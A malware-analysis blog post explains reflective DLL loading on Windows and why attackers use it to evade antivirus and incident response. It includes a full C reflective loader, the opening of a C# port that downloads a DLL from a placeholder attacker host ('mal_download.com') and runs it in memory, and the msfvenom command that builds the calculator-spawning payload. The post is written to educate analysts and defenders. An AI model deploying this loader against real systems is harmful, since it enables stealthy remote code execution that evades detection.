April 25, 2024

Loading DLLs Reflections

Written by Scott Nusbaum
Malware Analysis

We're back with another post about common malware techniques. This time we're not talking about process hollowing. Instead, we are going to branch off and talk about the reflective loading of a DLL. This technique loads a DLL into the memory of a process without that DLL ever being written to disk. A similar technique is used to load Beacon Object Files (BOF) or Common Object File Format (COFF) files in memory. The goal is to mimic the Windows API's LoadLibrary function. LoadLibrary loads a DLL into the process memory space but requires that the DLL be stored somewhere on the target system's disk. One benefit of not writing the DLL to disk is that it won't be scanned by basic antivirus products that only inspect files. Another is that it makes it harder for Incident Responders to identify the contents of the DLL.

In this blog, we will only discuss reflective loading into the current process; however, it wouldn’t be that difficult to make modifications to allow the loading of the DLL into a remote process. In the real world, this could be used as another method to hide the malicious code by downloading the DLL with one process, then injecting it into another process, and then loading it into that process. If this is something you would like us to write a blog about, let us know on X/Twitter!

We will demonstrate this method in C and C# like we have in previous posts.

1.1      How Does it Work?

The main benefit of using a reflective loader is that the malicious DLL is never written to disk. So, we need to find a way to transfer the DLL to the program. This can be done in multiple ways, including packaging it in the program itself or downloading it from an external site. The drawback to packaging the DLL inside the program is that a Reverse Engineer can easily carve it out of the static binary. One alternative is to host it on an external website. This gives the attacker the flexibility to swap out the DLL when different functionality is needed and, as seen frequently during Incident Response (IR) cases, to remove the DLL from the site altogether. Removing the DLL from the site makes IR more difficult, if not impossible, because the only way to obtain the DLL would be to dump the memory of the running program. In most cases, the program is no longer running.

Now that we have access to the DLL in memory, let's begin making it runnable. To execute the contents of the DLL, we need to allocate memory with permission to execute. Again, there are multiple approaches to setting up this new memory, as not all sections need the same read, write, or execute permissions. For the sake of simplicity, we allocate one large chunk of memory with all three permissions, using the size and location requested by the DLL. By "requested by the DLL", I mean that the DLL's Optional Header holds two fields with the size of the loaded image and its preferred memory location: SizeOfImage and ImageBase.

Figure 1 - IMAGE_OPTIONAL_HEADER structure
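To make the two fields concrete, here is a minimal, portable sketch that pulls ImageBase and SizeOfImage out of a raw 64-bit (PE32+) file buffer. It is not the loader's code: the names pe_layout and pe64_read_layout are hypothetical, and the byte offsets are hard-coded from the PE32+ layout instead of using the winnt.h structures.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Read little-endian integers byte by byte so the sketch does not depend on
 * host endianness or alignment. */
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static uint64_t rd64(const uint8_t *p) {
    return (uint64_t)rd32(p) | ((uint64_t)rd32(p + 4) << 32);
}

/* Hypothetical container for the two values the loader needs. */
typedef struct {
    uint64_t image_base;    /* OptionalHeader.ImageBase   */
    uint32_t size_of_image; /* OptionalHeader.SizeOfImage */
} pe_layout;

/* Returns 0 on success, -1 if the buffer does not look like a PE32+ file. */
int pe64_read_layout(const uint8_t *buf, size_t len, pe_layout *out) {
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z') return -1;

    uint32_t e_lfanew = rd32(buf + 0x3C); /* file offset of "PE\0\0" */

    /* 4-byte signature + 20-byte file header + 240-byte optional header */
    if (e_lfanew > len || len - e_lfanew < 4 + 20 + 240) return -1;

    const uint8_t *nt = buf + e_lfanew;
    if (rd32(nt) != 0x00004550u) return -1;            /* "PE\0\0" */

    const uint8_t *opt = nt + 4 + 20;                   /* optional header */
    if ((opt[0] | (opt[1] << 8)) != 0x20B) return -1;   /* PE32+ magic */

    out->image_base = rd64(opt + 24);     /* ImageBase is 8 bytes in PE32+ */
    out->size_of_image = rd32(opt + 56);
    return 0;
}
```

On Windows the same values come straight from ntHeaders->OptionalHeader, as the walkthrough later shows; the explicit offsets here only illustrate where those fields live in the file.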

Now that we know the preferred location and the size of the DLL, we allocate the memory using VirtualAlloc, passing it the requested location, the size, and the requested permissions. VirtualAlloc attempts to allocate at the requested address. If that range conflicts with memory that is already allocated, the call fails and returns NULL rather than choosing a different address, so a loader that wants a fallback must call VirtualAlloc again with a NULL address and let the system pick the location.

Now that we have an empty buffer with the correct size and permissions, let's start copying over the contents of the DLL. We cannot just do a simple copy of the entire DLL, since the sections sit at different offsets in memory than they do in the file. So, we start by copying the headers (the MZ and PE headers along with the section headers) into the beginning of our new memory. Then we copy each section into the new memory at the offset (VirtualAddress) requested in its IMAGE_SECTION_HEADER structure.

Figure 2 - IMAGE_SECTION_HEADER
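The difference between the file layout and the memory layout can be sketched without any Windows types. In the example below, section_info and map_image are hypothetical names, and section_info carries only the three IMAGE_SECTION_HEADER fields the copy step needs. Unlike the walkthrough code, this sketch bounds-checks every copy.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Simplified stand-in for IMAGE_SECTION_HEADER: only the fields used by the
 * copy step. The real structure in winnt.h has more members. */
typedef struct {
    uint32_t virtual_address;     /* RVA of the section once mapped */
    uint32_t size_of_raw_data;    /* number of bytes stored in the file */
    uint32_t pointer_to_raw_data; /* file offset of those bytes */
} section_info;

/* Copy headers and sections from the raw file layout into the mapped layout.
 * Returns 0 on success, -1 if a copy would fall outside either buffer. */
int map_image(uint8_t *mapped, size_t mapped_len,
              const uint8_t *file, size_t file_len,
              uint32_t size_of_headers,
              const section_info *sections, size_t count) {
    if (size_of_headers > file_len || size_of_headers > mapped_len) return -1;
    memcpy(mapped, file, size_of_headers); /* headers keep offset 0 */

    for (size_t i = 0; i < count; i++) {
        const section_info *s = &sections[i];
        if (s->pointer_to_raw_data > file_len ||
            s->size_of_raw_data > file_len - s->pointer_to_raw_data ||
            s->virtual_address > mapped_len ||
            s->size_of_raw_data > mapped_len - s->virtual_address) {
            return -1;
        }
        /* source: file offset; destination: base + VirtualAddress */
        memcpy(mapped + s->virtual_address,
               file + s->pointer_to_raw_data, s->size_of_raw_data);
    }
    return 0;
}
```

A section stored at file offset 0x400 with a VirtualAddress of 0x1000 therefore ends up 0x1000 bytes into the mapped buffer, which is why a single memcpy of the whole file would not work.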

With the sections in place, the two remaining tasks are to Patch the Relocations and to address the Import Table.

Relocations are memory addresses stored in the DLL that refer to objects or items needed during execution; strings are one example. When the DLL is built, the offset to each of these objects is known, but the final full memory address is not, so the addresses are written as if the DLL were loaded at its preferred base. Before execution, these addresses need to be updated with the actual location in the process memory. Remember that we ask VirtualAlloc for the preferred address but may end up loading the DLL somewhere else. Relocations handle that case. The DLL contains a table listing every location that holds such an address. We iterate through these entries, add the difference between the actual and preferred base to the stored address, and write the result back in place. We will talk about this more when walking through the code.
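The arithmetic behind a single fixup is small enough to show on its own. The function name rebase_address is hypothetical and the addresses in the example are illustrative, not taken from the sample DLL.

```c
#include <assert.h>
#include <stdint.h>

/* Rebase one absolute 64-bit address. The stored value assumed the preferred
 * base, so it is shifted by the distance between the actual and preferred
 * base. Unsigned arithmetic wraps, so this also works when the actual base
 * is lower than the preferred one. */
uint64_t rebase_address(uint64_t stored, uint64_t preferred_base,
                        uint64_t actual_base) {
    uint64_t delta = actual_base - preferred_base;
    return stored + delta;
}
```

For example, a pointer stored as 0x180003000 in a DLL built for base 0x180000000 becomes 0x1A0003000 if the image is loaded at 0x1A0000000. If the image lands at its preferred base, the delta is zero and nothing changes.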

The final piece that needs to be addressed is the Import Table. The Import Table lists all the external libraries that our DLL depends on to run, along with the functions it uses from each. We need to make sure each of these libraries is loaded into memory and then update the Import Address Table with the address of each function. It's easier than it sounds, and again we will walk through this in the code.

At this point, we are almost ready to use our DLL. The only remaining thing to do is to determine what function we want to call. In most cases, the DLLMain is called. Some malware hides its functionality in other functions, which requires the calling program to determine the offset and then jump to the obfuscated address. The location of the DLLMain, or entry point, is also available in the IMAGE_OPTIONAL_HEADER shown in Figure 1. We just add that offset to the buffer address, and we are good to go.

1.2      What Do the Attackers Gain?

We discussed what reflective DLL loading is, gave an overview of how to do it, and even hinted at some of the benefits of using this technique. In this section, we will dig deeper into those benefits.

One of the primary benefits of Reflective Loading is the ability to load the DLL from memory without ever touching the disk. This is key to evading antivirus detections that scan files as they are written to disk. It also makes it harder for an Incident Response team to find the DLL and reverse engineer it after the fact.

Another form of anti-forensics is downloading the DLL from a remote source. Downloading the DLL directly into memory makes it difficult for defenders to gain access to it. The defenders will either need to capture all traffic across the network and do SSL stripping or, after the fact, reach out to the online resource to download a copy. However, most of the time, the online resources are removed within days, if not hours. Hosting the resources online also allows the attackers greater flexibility in the features they use. The stager on the target system doesn't know or care what the DLL does; it just downloads it and executes it. This allows the stager to be generic and burnable while the main code can be updated and changed.

In the previous blog, we discussed DLL Injection. To perform it, we had to load a new DLL into memory using LoadLibrary. That DLL showed up in the memory map and in the list of loaded modules for the process. An experienced defender might spot it simply by noticing that one library in the module list is out of place. Reflective Loading avoids this by not using LoadLibrary, so the DLL only shows up in the memory layout as an ordinary allocation, which is very common in programs. The only difference is that the permissions on that region include Read, Write, and Execute. These permissions can be changed per section to be stealthier, but our example doesn't do that. The following image shows the execution of the C program on the left and the memory layout for that process on the right. The highlighted line contains our malicious DLL. As you can see, it doesn't stand out as a DLL, but it does have its protection set to RWX (Read, Write, and Execute).

Figure 3 - Memory allocations after the reflective loader executes

The next image is of the loaded Modules in the C program. Notice that this only contains the normal libraries.

Figure 4 - Process Modules

The following image illustrates the execution of the malicious DLL, which spawns a calculator. In the console under the calculator, the output shows the memory address that was returned by the VirtualAlloc and which holds the DLL. The right shows the memory layout of the C# process.

Figure 5 - C# Memory Layout After Reflective Loader Execution

The next image shows the loaded Modules for the C# program. This is a .NET program, so it contains a larger number of DLLs than the C version, but it also doesn't contain the malicious DLL's name.

Figure 6 - C# Process Modules
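As noted earlier in this section, the RWX region is the one thing that stands out, and a stealthier loader could set permissions per section instead. The sketch below shows one way that mapping could look. It is not part of the samples in this post: protection_for_section is a hypothetical helper, and the constants repeat the winnt.h values for the IMAGE_SCN_MEM_* and PAGE_* flags so that the example stands alone.

```c
#include <assert.h>
#include <stdint.h>

/* Section characteristic flags (values of IMAGE_SCN_MEM_* in winnt.h). */
#define SCN_MEM_EXECUTE 0x20000000u
#define SCN_MEM_READ    0x40000000u
#define SCN_MEM_WRITE   0x80000000u

/* Page protection constants (values of PAGE_* in winnt.h). */
#define PG_NOACCESS          0x01u
#define PG_READONLY          0x02u
#define PG_READWRITE         0x04u
#define PG_EXECUTE           0x10u
#define PG_EXECUTE_READ      0x20u
#define PG_EXECUTE_READWRITE 0x40u

/* Pick the narrowest page protection that satisfies a section's flags. */
uint32_t protection_for_section(uint32_t characteristics) {
    int x = (characteristics & SCN_MEM_EXECUTE) != 0;
    int r = (characteristics & SCN_MEM_READ) != 0;
    int w = (characteristics & SCN_MEM_WRITE) != 0;

    if (x) {
        if (w) return PG_EXECUTE_READWRITE;
        return r ? PG_EXECUTE_READ : PG_EXECUTE;
    }
    if (w) return PG_READWRITE;
    return r ? PG_READONLY : PG_NOACCESS;
}
```

A loader taking this approach would allocate the region as read/write, finish relocations and imports, and only then call VirtualProtect on each section with the value returned here, so that a typical code section ends up execute/read rather than RWX.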

1.3      Code Demonstration in C and C#

The first code sample we will review is written in C. It downloads a file from the Internet, reflectively loads the new DLL into the current process, and executes the malicious code by calling the DLL's DLLMain function. The DLL used in these examples was created using msfvenom -f dll -p windows/exec CMD="c:\\windows\\system32\\calc.exe" -o spawn_calc.dll.

While reviewing both the C and the C# code, I will skip over the functions used to download the remote DLL, as they are outside the scope of this blog.

-       Lines 259-269: The program's main function. It sleeps for 10 seconds to allow time to attach a debugger, then downloads the DLL from the provided URI and passes it to the reflective_loader function, which loads it into the current process's memory.

0259: int main()
0260: {
0261:     //sleep for 10 seconds
0262:     Sleep(10000);
0263: 
0264:     char* dllBytes = NULL;
0265: 
0266:     dllBytes = DownloadToBuffer("http://mal_download.com/spawn_calc.dll");
0267:     reflective_loader( dllBytes );
0268: 
0269:     free(dllBytes);

-       Line 20: Function header for reflective_loader. Takes as an argument a pointer to a memory location containing the DLL

-       Line 23-24: Casts the beginning of the argument buffer to an IMAGE_DOS_HEADER, allowing quick access to the MZ header. Using the IMAGE_DOS_HEADER, we get the offset to the PE header (e_lfanew) and set a pointer to that part of the argument buffer using the IMAGE_NT_HEADERS structure. In Figure 7 the IMAGE_DOS_HEADER is highlighted in RED and the IMAGE_NT_HEADERS is highlighted in BLUE. The value located at 0x18000003C, highlighted in Orange, is the offset (0xD0) to the IMAGE_NT_HEADERS. 0x180000000 + 0xD0 => 0x1800000D0

0020: int reflective_loader( char* dllBytes )
0021: {
0022:     // get pointers to in-memory DLL headers
0023:     PIMAGE_DOS_HEADER dosHeaders = (PIMAGE_DOS_HEADER)dllBytes;
0024:     PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)dllBytes +
0025:                                   dosHeaders->e_lfanew);

Figure 7 - DLLs MZ and PE headers

-       Line 27-33: Verifies that the DLL is not a 32-bit version. The 32-bit version uses different structure sizes, and this reflective loader was only designed for 64-bit DLLs. The check uses the Machine field of the IMAGE_FILE_HEADER structure, shown in Orange in Figure 8. IMAGE_FILE_MACHINE_I386 is equal to 0x14c; as shown in RED in Figure 8, the value in this DLL is 0x8664 (IMAGE_FILE_MACHINE_AMD64). The field is stored little-endian, so the bytes appear in the file as "64 86" and are read as 0x8664.

Figure 8 - PE Headers Machine Type

-       Line 34: Obtains the size of the DLL as needed when expanded in Memory. The size is located in the OptionalHeader, which is located directly after the File header in the IMAGE_NT_HEADERS structure. Shown in Orange in Figure 8.

-       Line 37: Uses the size obtained in line 34 to allocate a new memory region for the DLL at the preferred location from the Optional Header, with Read, Write, and Execute permissions. VirtualAlloc's first parameter is the requested address. If that range is already in use, VirtualAlloc fails and returns NULL. The listing does not check for this, so a more defensive loader would retry with a NULL address and let the system choose the location.

-       Line 41: Because the DLL may end up at an address other than its preferred location, the difference between the actual location and the preferred location is calculated. This difference is used later when resolving relocations.

-       Line 45: Copies the headers (SizeOfHeaders bytes) from the downloaded buffer to the start of the newly allocated memory.

0034:     SIZE_T dllImageSize = ntHeaders->OptionalHeader.SizeOfImage;
0035: 
0036:     // allocate new memory space for the DLL at the image's preferred base address; VirtualAlloc returns NULL if that range is unavailable
0037:     LPVOID dllBase = VirtualAlloc((LPVOID)ntHeaders->OptionalHeader.ImageBase,
0038:                                   dllImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
0039: 
0040:     // get delta between this module's image base and the DLL that was read into memory
0041:     DWORD_PTR deltaImageBase = (DWORD_PTR)dllBase - (DWORD_PTR)
0042:                                ntHeaders->OptionalHeader.ImageBase;
0043: 
0044:     // copy over DLL image headers to the newly allocated space for the DLL
0045:     memcpy(dllBase, dllBytes, ntHeaders->OptionalHeader.SizeOfHeaders);
0046: 
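The listing above picks up at line 34, so the architecture check described for lines 27-33 is not shown. The following is a minimal sketch of what such a check can look like, not the author's code. The names pe_machine and is_x64_image are hypothetical, and the field is read byte by byte to make the little-endian ordering explicit.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MACHINE_I386  0x014Cu /* IMAGE_FILE_MACHINE_I386  */
#define MACHINE_AMD64 0x8664u /* IMAGE_FILE_MACHINE_AMD64 */

/* Return the Machine field of the file header, or 0 if the buffer is too
 * short. nt_offset is the e_lfanew value; Machine is the first field after
 * the 4-byte "PE\0\0" signature. */
uint16_t pe_machine(const uint8_t *buf, size_t len, uint32_t nt_offset) {
    if (len < 6 || nt_offset > len - 6) return 0;
    const uint8_t *p = buf + nt_offset + 4;
    /* little-endian: the bytes 64 86 in the file are the value 0x8664 */
    return (uint16_t)(p[0] | (p[1] << 8));
}

/* Accept only x64 images. */
int is_x64_image(const uint8_t *buf, size_t len, uint32_t nt_offset) {
    return pe_machine(buf, len, nt_offset) == MACHINE_AMD64;
}
```

One design difference is worth noting: the walkthrough rejects images whose Machine value is IMAGE_FILE_MACHINE_I386, whereas this sketch accepts only IMAGE_FILE_MACHINE_AMD64, which also turns away other architectures the loader was not written for.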

-       Line 48: Gets the first IMAGE_SECTION_HEADER from the array that follows directly after the OptionalHeader. IMAGE_FIRST_SECTION is a preprocessor macro that adds the size of the OptionalHeader to the address of the OptionalHeader. That size is stored in the FileHeader (SizeOfOptionalHeader), shown in Red in Figure 9. i.e. 0x1800000E0 + 0xF0 = 0x1800001D0

-       Line 49 - 57: Loops through the array of Section Headers and copies each section to the memory offset calculated by adding the section's VirtualAddress to the allocated memory base location.

-       Line 51: The destination is the allocated base plus the section's VirtualAddress. The first section's VirtualAddress is shown in Pink in Figure 9. i.e. 0x180000000 + 0x1000.

-       Line 53: The source is calculated by adding the address of the downloaded buffer (dllBytes), not the newly allocated base, to the section's PointerToRawData, shown in Light Blue in Figure 9. i.e. 0x400 bytes from the start of the file.


0047:     // copy over DLL image sections to the newly allocated space for the DLL
0048:     PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(ntHeaders);
0049:     for (size_t i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++)
0050:     {
0051:         LPVOID sectionDestination = (LPVOID)((DWORD_PTR)dllBase +
0052:                                              (DWORD_PTR)section->VirtualAddress);
0053:         LPVOID sectionBytes = (LPVOID)((DWORD_PTR)dllBytes + (DWORD_PTR)
0054:                                        section->PointerToRawData);
0055:         memcpy(sectionDestination, sectionBytes, section->SizeOfRawData);
0056:         section++;
0057:     }
0058: 
Figure 9 - PE Headers IMAGE_SECTION_HEADER
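The pointer arithmetic that IMAGE_FIRST_SECTION performs can be written out as plain offset math. This is a sketch under the assumption of the standard PE layout (a 4-byte signature and a 20-byte file header ahead of the optional header, and 40-byte section headers); the function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define PE_SIGNATURE_SIZE   4u  /* "PE\0\0" */
#define FILE_HEADER_SIZE    20u /* sizeof(IMAGE_FILE_HEADER) */
#define SECTION_HEADER_SIZE 40u /* sizeof(IMAGE_SECTION_HEADER) */

/* File offset of the first section header: the section table starts right
 * after the optional header, whose size is read from the file header. */
uint32_t first_section_offset(uint32_t e_lfanew,
                              uint16_t size_of_optional_header) {
    return e_lfanew + PE_SIGNATURE_SIZE + FILE_HEADER_SIZE +
           size_of_optional_header;
}

/* File offset of the section header at the given zero-based index. */
uint32_t section_header_offset(uint32_t e_lfanew,
                               uint16_t size_of_optional_header,
                               uint32_t index) {
    return first_section_offset(e_lfanew, size_of_optional_header) +
           index * SECTION_HEADER_SIZE;
}
```

The loop in the listing does the same thing with section++, which advances the pointer by one IMAGE_SECTION_HEADER at a time.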

-       Line 60-95: In this section, we patch all the relocation addresses to account for the location that was returned by VirtualAlloc.

-       Line 60: Parses the OptionalHeader struct to get access to the IMAGE_DATA_DIRECTORY structure that holds the offset to the relocation table. In Figure 10, the highlighted Blue and Red squares represent the IMAGE_DATA_DIRECTORY.

-       Line 62: Gets a pointer to the relocation table by adding the VirtualAddress from the IMAGE_DATA_DIRECTORY to the base address.

-       Line 65: Loops while the number of relocation bytes processed is less than the size listed in the IMAGE_DATA_DIRECTORY struct, shown in Red in Figure 10. In this example, the size is zero and the loop is skipped.

-       Line 67 - 72: Uses the relocation table pointer to find the next relocation block and advances the processed count past the block header. Next, the number of entries in the block is derived from BlockSize, and a pointer to the first BASE_RELOCATION_ENTRY is calculated by adding the processed count to the relocation table pointer.

-       Line 74 - 93: Loops through the BASE_RELOCATION_ENTRY array and patches every entry whose type is not 0. Entries of type 0 are padding and are skipped.

-       Line 84: Calculates the offset of the memory location that needs to be patched: the block's page address plus the entry's offset.

-       Line 87: Reads the current value at that location and stores it in addressToPatch.

-       Line 90: Adds the delta calculated on Line 41 to addressToPatch.

-       Line 91: Writes the new value back into the original spot.

0059:     // perform image base relocations
0060:     IMAGE_DATA_DIRECTORY relocations =
0061:         ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
0062:     DWORD_PTR relocationTable = relocations.VirtualAddress + (DWORD_PTR)dllBase;
0063:     DWORD relocationsProcessed = 0;
0064: 
0065:     while (relocationsProcessed < relocations.Size)
0066:     {
0067:         PBASE_RELOCATION_BLOCK relocationBlock = (PBASE_RELOCATION_BLOCK)(
0068:                 relocationTable + relocationsProcessed);
0069:         relocationsProcessed += sizeof(BASE_RELOCATION_BLOCK);
0070:         DWORD relocationsCount = (relocationBlock->BlockSize - sizeof(
0071:                                       BASE_RELOCATION_BLOCK)) / sizeof(BASE_RELOCATION_ENTRY);
0072:         PBASE_RELOCATION_ENTRY relocationEntries = (PBASE_RELOCATION_ENTRY)(
0073:                 relocationTable + relocationsProcessed);
0074: 
0075:         for (DWORD i = 0; i < relocationsCount; i++)
0076:         {
0077:             relocationsProcessed += sizeof(BASE_RELOCATION_ENTRY);
0078: 
0079:             if (relocationEntries[i].Type == 0)
0080:             {
0081:                 continue;
0082:             }
0083: 
0084:             DWORD_PTR relocationRVA = relocationBlock->PageAddress +
0085:                                       relocationEntries[i].Offset;
0086:             DWORD_PTR addressToPatch = 0;
0087:             ReadProcessMemory(GetCurrentProcess(),
0088:                               (LPCVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch,
0089:                               sizeof(DWORD_PTR), NULL);
0090:             addressToPatch += deltaImageBase;
0091:             memcpy((PVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch,
0092:                    sizeof(DWORD_PTR));
0093:         }
0094:     }
0095: 
Figure 10 - PE Header Relocations
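Because the sample DLL has an empty relocation table, the loop above never runs against real data. To show the format it expects, here is a portable sketch that walks a relocation table inside an already mapped image buffer. It assumes the standard layout: each block begins with an 8-byte header (page RVA, then block size in bytes) followed by 16-bit entries whose high 4 bits are the type and low 12 bits are the offset within the page. The function name apply_relocations is hypothetical, and unlike the listing, which patches every non-zero type as a 64-bit value, this sketch only patches type 10 (IMAGE_REL_BASED_DIR64) entries and bounds-checks each access.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define REL_BASED_DIR64 10u /* IMAGE_REL_BASED_DIR64: 64-bit absolute address */

static uint16_t rd16(const uint8_t *p) {
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Add delta to every DIR64 target listed in the relocation table.
 * Returns the number of patched addresses, or -1 on a malformed table. */
int apply_relocations(uint8_t *image, size_t image_len,
                      uint32_t reloc_rva, uint32_t reloc_size,
                      uint64_t delta) {
    if (reloc_rva > image_len || reloc_size > image_len - reloc_rva) return -1;

    int patched = 0;
    uint32_t done = 0;
    while (reloc_size - done >= 8) {
        const uint8_t *block = image + reloc_rva + done;
        uint32_t page_rva = rd32(block);       /* page the entries refer to */
        uint32_t block_size = rd32(block + 4); /* header plus entries */
        if (block_size < 8 || block_size > reloc_size - done) return -1;

        uint32_t entries = (block_size - 8) / 2;
        for (uint32_t i = 0; i < entries; i++) {
            uint16_t entry = rd16(block + 8 + 2 * i);
            uint16_t type = (uint16_t)(entry >> 12);
            uint16_t offset = (uint16_t)(entry & 0x0FFF);
            if (type != REL_BASED_DIR64) continue; /* type 0 is padding */

            uint64_t target = (uint64_t)page_rva + offset;
            if (target > image_len || image_len - target < 8) return -1;

            /* memcpy keeps the access alignment-safe; the stored value is
             * little-endian, which matches the host on x64 */
            uint64_t value;
            memcpy(&value, image + target, sizeof value);
            value += delta;
            memcpy(image + target, &value, sizeof value);
            patched++;
        }
        done += block_size;
    }
    return patched;
}
```

With a table size of zero, as in the sample DLL, the loop body never executes and the function returns 0.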

-       Line 96 - 135: This section parses the DLL's Import Table and loads any dependencies into memory.

-       Line 98: Copies the IMAGE_DATA_DIRECTORY entry that describes the import data. It is selected with the index IMAGE_DIRECTORY_ENTRY_IMPORT, which is the second entry in the array of IMAGE_DATA_DIRECTORY structures. This entry is highlighted in Red in Figure 11.

-       Line 100: Uses the directory entry from line 98 to calculate the address of the first IMAGE_IMPORT_DESCRIPTOR structure: 0x180000000 + 0x21B8. See the highlighted Red section of Figure 11 for the IMAGE_IMPORT_DESCRIPTOR structure.

-       Line 105: Iterates through the import descriptors until it reaches one with an empty Name. Each Name is the name of a DLL to be loaded. In our example, the only one is Kernel32.dll. The calculation to derive the name is highlighted in Blue in Figure 11: the value stored at 0x1800031c4 is the offset 0x233a, which when added to the base address 0x180000000 gives 0x18000233a, the location of the ASCII string Kernel32.dll.

-       Line 108: LoadLibraryA is then used to load this common Windows DLL into memory if it is not already loaded, and it returns the address of the library in memory.

-       Line 115 - 131: Iterates through the list of functions within the loaded library that are used in our malicious DLL and updates the addresses.

-       Line 113: Stores the address of the first IMAGE_THUNK_DATA. This is a union structure, so it can hold multiple values in the same memory location.

-       Line 115: Loops as long as the virtual address of the data is not empty.

-       Line 117 - 121: Processes the Thunk if it's of the ordinal type. This is when the function is referenced with an index value rather than an ASCII name.

-       Line 123 - 128: Processes the Thunk if it references the function by name and saves the resolved address of the function. The lookup chain is highlighted in Orange in Figure 12. First, the offset is retrieved from 0x1800021b0, which points to the first Thunk at 0x1800021e0. That structure contains the offset 0x2250, which points to the ASCII string "CloseHandle" at 0x180002250.

0096:     // resolve import address table
0097:     PIMAGE_IMPORT_DESCRIPTOR importDescriptor = NULL;
0098:     IMAGE_DATA_DIRECTORY importsDirectory =
0099:         ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
0100:     importDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(importsDirectory.VirtualAddress
0101:                        + (DWORD_PTR)dllBase);
0102:     LPCSTR libraryName = "";
0103:     HMODULE library = NULL;
0104: 
0105:     while (importDescriptor->Name != NULL)
0106:     {
0107:         libraryName = (LPCSTR)importDescriptor->Name + (DWORD_PTR)dllBase;
0108:         library = LoadLibraryA(libraryName);
0109: 
0110:         if (library)
0111:         {
0112:             PIMAGE_THUNK_DATA thunk = NULL;
0113:             thunk = (PIMAGE_THUNK_DATA)((DWORD_PTR)dllBase + importDescriptor->FirstThunk);
0114: 
0115:             while (thunk->u1.AddressOfData != NULL)
0116:             {
0117:                 if (IMAGE_SNAP_BY_ORDINAL(thunk->u1.Ordinal))
0118:                 {
0119:                     LPCSTR functionOrdinal = (LPCSTR)IMAGE_ORDINAL(thunk->u1.Ordinal);
0120:                     thunk->u1.Function = (DWORD_PTR)GetProcAddress(library, functionOrdinal);
0121:                 }
0122:                 else
0123:                 {
0124:                     PIMAGE_IMPORT_BY_NAME functionName = (PIMAGE_IMPORT_BY_NAME)((
0125:                             DWORD_PTR)dllBase + thunk->u1.AddressOfData);
0126:                     DWORD_PTR functionAddress = (DWORD_PTR)GetProcAddress(library,
0127:                                                 functionName->Name);
0128:                     thunk->u1.Function = functionAddress;
0129:                 }
0130:                 ++thunk;
0131:             }
0132:         }
0133: 
0134:         importDescriptor++;
0135:     }
0136: 
Figure 11 - Import Table Offsets
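The ordinal-versus-name decision made by IMAGE_SNAP_BY_ORDINAL and IMAGE_ORDINAL in the listing comes down to a few bit operations on the 64-bit thunk value. The sketch below spells them out, assuming the PE32+ encoding in which the top bit marks an import by ordinal. The names thunk_info, decode_thunk, and import_name_string_rva are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define ORDINAL_FLAG64 0x8000000000000000ULL /* IMAGE_ORDINAL_FLAG64 */

/* Hypothetical decoded view of one 64-bit import thunk. */
typedef struct {
    int by_ordinal;    /* 1: import by ordinal, 0: import by name */
    uint16_t ordinal;  /* meaningful when by_ordinal is 1 */
    uint32_t name_rva; /* RVA of IMAGE_IMPORT_BY_NAME when by_ordinal is 0 */
} thunk_info;

/* Classify a raw thunk value before it is overwritten with the address
 * of the resolved function. */
thunk_info decode_thunk(uint64_t raw) {
    thunk_info t = {0, 0, 0};
    if (raw & ORDINAL_FLAG64) {
        t.by_ordinal = 1;
        t.ordinal = (uint16_t)(raw & 0xFFFF); /* low 16 bits */
    } else {
        t.name_rva = (uint32_t)(raw & 0x7FFFFFFF); /* 31-bit RVA */
    }
    return t;
}

/* IMAGE_IMPORT_BY_NAME starts with a 2-byte Hint, so the function name
 * string begins two bytes after the RVA stored in the thunk. */
uint32_t import_name_string_rva(uint32_t name_rva) {
    return name_rva + 2;
}
```

In the listing, either branch ends with a GetProcAddress call, and the thunk is then overwritten with the resolved address, which is why the loader must decode the thunk before writing to it.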

The following figure shows the memory structure in Ghidra of the raw unpatched import table.

Figure 12 - Unpatched Import Table From Ghidra

Now, let’s look in X64Dbg at the patched memory after the reflective loader has been executed.

Figure 13 - Patched Import Table From X64Dbg

-       Line 138: Calculates the entry address, or DLLMain, for the DLL by adding the AddressOfEntryPoint from the OptionalHeader to the base memory address. The address is saved as a function pointer with three (3) parameters, since DLLMain takes three parameters. AddressOfEntryPoint is shown in Red in Figure 14.

-       Line 140: Calls the function pointer with the needed arguments to execute the malicious payload.

0137:     // execute the loaded DLL
0138:     void (*DLLEntry)(HINSTANCE, DWORD, LPVOID) = (void (*)(HINSTANCE, DWORD, LPVOID))
0139:         ((DWORD_PTR)dllBase + ntHeaders->OptionalHeader.AddressOfEntryPoint);
0140:     (*DLLEntry)((HINSTANCE)dllBase, DLL_PROCESS_ATTACH, 0);
0141: 
0142:     return 0;
0143: }
….
0271:     return 0;

Figure 14 - PE Header Determine the EntryPoint

The next code excerpt is in C# and performs the same actions as the C code above. We are not going to walk through the C# code line by line this time, since it's almost a direct port of the C code. The C# code is wrapped in an unsafe context, which allows us to use raw pointers that bypass the runtime's memory safety. The main difference between the two code samples is that we needed to define each of the structures ourselves, and we had to do more typecasting.

The following code is divided into groups to match those from the C section.

Main Class

unsafe class Program
{
….
  static void Main(string[] args)
  {
    byte[] dllBytes;
    dllBytes =
        DownloadToBuffer("http://mal_download.com/spawn_calc.dll");
    reflective_loader(dllBytes);
  }
}

